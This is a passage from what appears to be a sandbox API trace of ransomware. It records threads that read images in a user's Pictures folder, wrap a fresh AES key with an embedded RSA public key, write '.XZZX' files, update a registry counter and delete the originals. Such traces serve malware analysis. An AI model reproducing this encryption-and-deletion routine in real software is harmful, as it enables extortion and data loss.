lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0124.714] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9da [0124.714] SetErrorMode (uMode=0x1) returned 0x1 [0124.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0124.714] OutputDebugStringW (lpOutputString="end") [0124.715] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`ÕI\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0124.715] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x449dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8 | out: pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8) returned 1 [0124.715] CryptAcquireContextW (in: phProv=0x449d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x449d3e4*=0x3ce2c98) returned 1 [0124.716] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2c98, dwCertEncodingType=0x1, pInfo=0x3d0d208*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d238*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d240*, PublicKey.cUnusedBits=0x0), phKey=0x449d3ec | out: phKey=0x449d3ec*=0x3cddb98) returned 1 [0124.716] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.716] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0124.716] CryptEncrypt (in: hKey=0x3cddb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x449d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x449d3f0*=0x80) returned 1 [0124.716] CryptEncrypt (in: hKey=0x3cddb98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2d20*, pdwDataLen=0x449d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2d20*, pdwDataLen=0x449d3e8*=0x80) returned 1 [0124.717] WriteFile (in: hFile=0x5cc, lpBuffer=0x3ce2d20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2d20*, lpNumberOfBytesWritten=0x449e438*=0x80, lpOverlapped=0x0) returned 1 [0124.717] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0124.717] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0124.717] GetUserNameW (in: lpBuffer=0x449e1f8, pcbBuffer=0x449dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x449dfe0) returned 1 [0124.811] wsprintfW (in: param_1=0x449dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0124.811] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe4 | out: phkResult=0x449dfe4*=0x5f8) returned 0x0 [0124.811] RegQueryValueExW (in: hKey=0x5f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x449dfd8, lpData=0x449dfec, lpcbData=0x449dfdc*=0x4 | out: lpType=0x449dfd8*=0x4, lpData=0x449dfec*=0x90, lpcbData=0x449dfdc*=0x4) returned 0x0 [0124.811] RegCloseKey (hKey=0x5f8) returned 0x0 [0124.811] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe8 | out: phkResult=0x449dfe8*=0x5f8) returned 0x0 [0124.812] RegSetValueExW (in: hKey=0x5f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x449dfec*=0x91, cbData=0x4 | out: lpData=0x449dfec*=0x91) returned 0x0 [0124.812] RegCloseKey (hKey=0x5f8) returned 0x0 [0124.812] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.812] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.813] CloseHandle (hObject=0x5cc) returned 1 [0124.813] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0124.814] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0124.814] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ghz9u7C.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghz9u7c.png")) returned 1 [0124.815] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ghz9u7C.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghz9u7c.png")) returned 0 Thread: id = 409 os_tid = 0x974 [0124.648] lstrcpyA (in: lpString1=0x435fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.648] lstrcpyW (in: lpString1=0x435f460, lpString2="gpnG5_ q-ZTGc_4b76b.png" | out: lpString1="gpnG5_ q-ZTGc_4b76b.png") returned="gpnG5_ q-ZTGc_4b76b.png" [0124.648] lstrcpyW (in: lpString1=0x435e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.648] SetErrorMode (uMode=0x1) returned 0x1 [0124.648] lstrcpyW (in: lpString1=0x435f860, lpString2="gpnG5_ q-ZTGc_4b76b.png" | out: lpString1="gpnG5_ q-ZTGc_4b76b.png") returned="gpnG5_ q-ZTGc_4b76b.png" [0124.648] CoCreateGuid (in: pguid=0x435e440 | out: pguid=0x435e440*(Data1=0xcfd71110, Data2=0x3f5, Data3=0x4338, Data4=([0]=0xaa, [1]=0xb2, [2]=0x92, [3]=0x94, [4]=0x88, [5]=0xab, [6]=0x23, [7]=0xd6))) returned 0x0 [0124.648] wsprintfW (in: param_1=0x435ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gpnG5_ q-ZTGc_4b76b.png") returned 66 [0124.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x435fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0124.648] wsprintfW (in: param_1=0x435e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6E0684500109FC98CFD71110053FE0E0.XZZX") returned 80 [0124.648] StrStrW (lpFirst="gpnG5_ q-ZTGc_4b76b.png", lpSrch="XZZX") returned 0x0 [0124.648] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gpnG5_ q-ZTGc_4b76b.png", dwFileAttributes=0x20) returned 1 [0124.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gpnG5_ q-ZTGc_4b76b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gpng5_ q-ztgc_4b76b.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0124.649] ReadFile (in: hFile=0x5cc, lpBuffer=0x3ce77e0, nNumberOfBytesToRead=0x4fb3, lpNumberOfBytesRead=0x435e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesRead=0x435e418*=0x4fb3, lpOverlapped=0x0) returned 1 [0124.650] CloseHandle (hObject=0x5cc) returned 1 [0124.650] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0124.651] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0124.651] SetErrorMode (uMode=0x1) returned 0x1 [0124.651] lstrcpyW (in: lpString1=0x435e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0124.651] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce2c10) returned 1 [0124.654] CryptGenKey (in: hProv=0x3ce2c10, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc18) returned 1 [0125.003] CryptExportKey (in: hKey=0x3cddc18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x435e41c | out: pbData=0x0*, pdwDataLen=0x435e41c*=0x94) returned 1 [0125.003] CryptExportKey (in: hKey=0x3cddc18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x435e41c | out: pbData=0x40a0000*, pdwDataLen=0x435e41c*=0x94) returned 1 [0125.003] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.004] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.004] CryptDestroyKey (hKey=0x3cddc18) returned 1 [0125.004] CryptReleaseContext (hProv=0x3ce2e30, dwFlags=0x0) returned 0 [0125.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6E0684500109FC98CFD71110053FE0E0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6e0684500109fc98cfd71110053fe0e0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0125.005] WriteFile (in: hFile=0x5f0, lpBuffer=0x3ce77e0*, nNumberOfBytesToWrite=0x4fb3, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesWritten=0x435e438*=0x4fb3, lpOverlapped=0x0) returned 1 [0125.005] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4fb3 [0125.006] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.006] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4fb8 [0125.006] WriteFile (in: hFile=0x5f0, lpBuffer=0x435f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x435f860*, lpNumberOfBytesWritten=0x435e438*=0x2e, lpOverlapped=0x0) returned 1 [0125.006] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4fe6 [0125.006] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.006] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4feb [0125.006] SetErrorMode (uMode=0x1) returned 0x1 [0125.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.006] OutputDebugStringW (lpOutputString="end") [0125.006] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ5\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.006] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x435dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8 | out: pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8) returned 1 [0125.006] CryptAcquireContextW (in: phProv=0x435d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x435d3e4*=0x3ce2da8) returned 1 [0125.007] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2da8, dwCertEncodingType=0x1, pInfo=0x3d0d2d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d308*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d310*, PublicKey.cUnusedBits=0x0), phKey=0x435d3ec | out: phKey=0x435d3ec*=0x3cddc18) returned 1 [0125.007] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.009] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.009] CryptEncrypt (in: hKey=0x3cddc18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x435d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x435d3f0*=0x80) returned 1 [0125.009] CryptEncrypt (in: hKey=0x3cddc18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2eb8*, pdwDataLen=0x435d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2eb8*, pdwDataLen=0x435d3e8*=0x80) returned 1 [0125.009] WriteFile (in: hFile=0x5f0, lpBuffer=0x3ce2eb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2eb8*, lpNumberOfBytesWritten=0x435e438*=0x80, lpOverlapped=0x0) returned 1 [0125.009] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.009] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0125.009] GetUserNameW (in: lpBuffer=0x435e1f8, pcbBuffer=0x435dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x435dfe0) returned 1 [0125.009] wsprintfW (in: param_1=0x435dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.010] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe4 | out: phkResult=0x435dfe4*=0x5fc) returned 0x0 [0125.010] RegQueryValueExW (in: hKey=0x5fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x435dfd8, lpData=0x435dfec, lpcbData=0x435dfdc*=0x4 | out: lpType=0x435dfd8*=0x4, lpData=0x435dfec*=0x91, lpcbData=0x435dfdc*=0x4) returned 0x0 [0125.010] RegCloseKey (hKey=0x5fc) returned 0x0 [0125.010] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe8 | out: phkResult=0x435dfe8*=0x5fc) returned 0x0 [0125.010] RegSetValueExW (in: hKey=0x5fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x435dfec*=0x92, cbData=0x4 | out: lpData=0x435dfec*=0x92) returned 0x0 [0125.010] RegCloseKey (hKey=0x5fc) returned 0x0 [0125.010] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.010] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.011] CloseHandle (hObject=0x5f0) returned 1 [0125.012] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.012] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.012] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gpnG5_ q-ZTGc_4b76b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gpng5_ q-ztgc_4b76b.png")) returned 1 [0125.014] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gpnG5_ q-ZTGc_4b76b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gpng5_ q-ztgc_4b76b.png")) returned 0 Thread: id = 410 os_tid = 0x978 [0124.852] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.852] lstrcpyW (in: lpString1=0x420f460, lpString2="hl35zcYZE.bmp" | out: lpString1="hl35zcYZE.bmp") returned="hl35zcYZE.bmp" [0124.852] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.852] SetErrorMode (uMode=0x1) returned 0x1 [0124.853] lstrcpyW (in: lpString1=0x420f860, lpString2="hl35zcYZE.bmp" | out: lpString1="hl35zcYZE.bmp") returned="hl35zcYZE.bmp" [0124.853] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xbb66a40d, Data2=0x5447, Data3=0x408a, Data4=([0]=0xb5, [1]=0xad, [2]=0x60, [3]=0xf7, [4]=0xae, [5]=0x3b, [6]=0x2c, [7]=0x1d))) returned 0x0 [0124.853] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hl35zcYZE.bmp") returned 56 [0124.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0124.853] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A74BC39B153F2E46BB66A40D1960128E.XZZX") returned 80 [0124.853] StrStrW (lpFirst="hl35zcYZE.bmp", lpSrch="XZZX") returned 0x0 [0124.853] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hl35zcYZE.bmp", dwFileAttributes=0x20) returned 1 [0124.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hl35zcYZE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hl35zcyze.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0124.854] ReadFile (in: hFile=0x5f0, lpBuffer=0x3cf45c0, nNumberOfBytesToRead=0x14a84, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf45c0*, lpNumberOfBytesRead=0x420e418*=0x14a84, lpOverlapped=0x0) returned 1 [0124.855] CloseHandle (hObject=0x5f0) returned 1 [0124.855] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0124.856] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0124.856] SetErrorMode (uMode=0x1) returned 0x1 [0124.856] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0124.856] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce2e30) returned 1 [0124.859] CryptGenKey (in: hProv=0x3ce2e30, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddd18) returned 1 [0125.045] CryptExportKey (in: hKey=0x3cddd18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.045] CryptExportKey (in: hKey=0x3cddd18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x420e41c | out: pbData=0x4210000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.045] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.046] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.046] CryptDestroyKey (hKey=0x3cddd18) returned 1 [0125.046] CryptReleaseContext (hProv=0x3ce2e30, dwFlags=0x0) returned 0 [0125.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A74BC39B153F2E46BB66A40D1960128E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\a74bc39b153f2e46bb66a40d1960128e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0125.046] WriteFile (in: hFile=0x5f4, lpBuffer=0x3cf45c0*, nNumberOfBytesToWrite=0x14a84, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf45c0*, lpNumberOfBytesWritten=0x420e438*=0x14a84, lpOverlapped=0x0) returned 1 [0125.048] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14a84 [0125.048] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.048] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14a89 [0125.048] WriteFile (in: hFile=0x5f4, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x1a, lpOverlapped=0x0) returned 1 [0125.048] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, 